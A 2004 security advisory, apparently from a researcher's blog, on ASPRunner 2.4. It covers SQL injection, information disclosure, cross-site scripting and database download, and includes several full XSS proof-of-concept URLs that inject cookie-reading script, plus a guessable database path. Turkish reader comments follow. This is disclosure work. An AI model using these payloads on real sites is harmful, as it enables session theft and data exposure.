ASPRunner Multiple Vulnerabilities

26.07.2004
asp runner asprunner advisory exploit SQL Injection XSS Information Leakage Database Download

Okuyucu : 7.263
Günlük Okuyucu : 5
1) SQL Injection;
Severity : Moderatly Critical

2) Information Disclosure;
Severity : Low Critical

3) XSS (Cross Site Scripting);
Severity : Low Critical

4) Database Download;
Severity : Moderatly Critical


------------------------------------------------------
ABOUT ASPRunner;
------------------------------------------------------
Developer Description;
ASPRunner creates a set of ASP pages to access and modify Oracle, SQL Server, MS Access , DB2, MySQL, or FileMaker databases, or any other ODBC datasource. Using generated ASP pages, users can search, sort, edit, delete and add data into a database. ASPRunner is easy to learn, you can get started in just 10 minutes!

URL & Demo Download ;
http://www.xlinesoft.com/asprunner/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
ASPRunner version 2.4 and below


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
-

------------------------------------------------------
1) SQL Injection;
------------------------------------------------------
Every Page is vulnerable to SQL Injection atacks. (Login pages are not vulnerable). 
There is no POC because of SQL Injection attacks depends on database type and structure.



------------------------------------------------------
2) INFORMATION DISCLOSURE;
------------------------------------------------------
An attacker can gain several information from hidden fields and file names.

	- File names disclosure database generated table name.
	- Several hidden field shows complete SQL Queries
	- Also these hidden fields can be modified.
	- Errors are generating detailed page which gives lots of information to the client.

------------------------------------------------------
3) XSS (Cross Site Scripting);
------------------------------------------------------
There are no control for XSS attacks, some samples from several pages;
	
	- [TABLE]_search.asp (post)
	http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&SearchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldName=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=


	- [TABLE]_edit.asp (post)
	http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPageNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&NeedQuotes=&NeedQuotes=&action=view


	- [TABLE]_list.asp (post)
	http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPage=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQuoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=True&Typeen=202&NeedQuotesdesc=True&Typedesc=203

	- export.asp (post)
	http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&pagesize=20



------------------------------------------------------
4) Database Download;
------------------------------------------------------
	Database can be downloaded over web. This is not a critical issue because there is no way to determine filename. But it's easy to guess it by gathering information about table and field names.

	MS Access or other database file (if it's not MSSQL, similiar or ODBC Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]



-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 04.07.2004
Vendor Informed : 05.07.2004
Published : 26.07.2004

------------------------------------------------------
Vendor Status;
------------------------------------------------------
2 emails, No Reply, No Fix

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

Paylaşımın için teşekkürler.. İyi çalışmalr..

Şaban Akçay [ # | 27.07.2004 ]

selam...
asp.net´in gelistirilmis baska bi programi daha var ,.. ayni yazilim sirketinin!
yeni cikti , bu program hakkinda bilgin varmi?
cunku bu hafta ici almayi dusunuyordum.
-------------
sanal bir depo yapmayi amacliyorum.
databank backend olarak sql server kullaniliyor.ve Databank bitme asamasinda
simdi yapmam gereken ,internet üzerinden online hale getirebilmek.
O yüzden asp.net' le yapilmis hazir cözümler ariyorum.
bu konuda yardim edebilirmisin?
asp.net runner ' dan baska kullanabilecegim bi program varmi?
tesekkür ederim!

kökce [ # | 03.08.2004 ]

ASPRunner yeni gelistirilmis versiyonu 2.4 dan bayagi iyi- yorumlarinizi bekliyorum


http://www.asprunner.com/files/asprunnerpro32-setup.exe

Hakki [ # | 13.04.2005 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

ASPRunner Multiple Vulnerabilities ile İlişkili Olabilecek Yazılar - Haberler

Online Conversion Tool
Rgod
SQL Tunnelling - Exploiting Internal Networks via SQL Injection
Türkçe SQL Injection Referansı
MS08-006 Exploit

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Advisories » ASPRunner Multiple Vulnerabilities

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında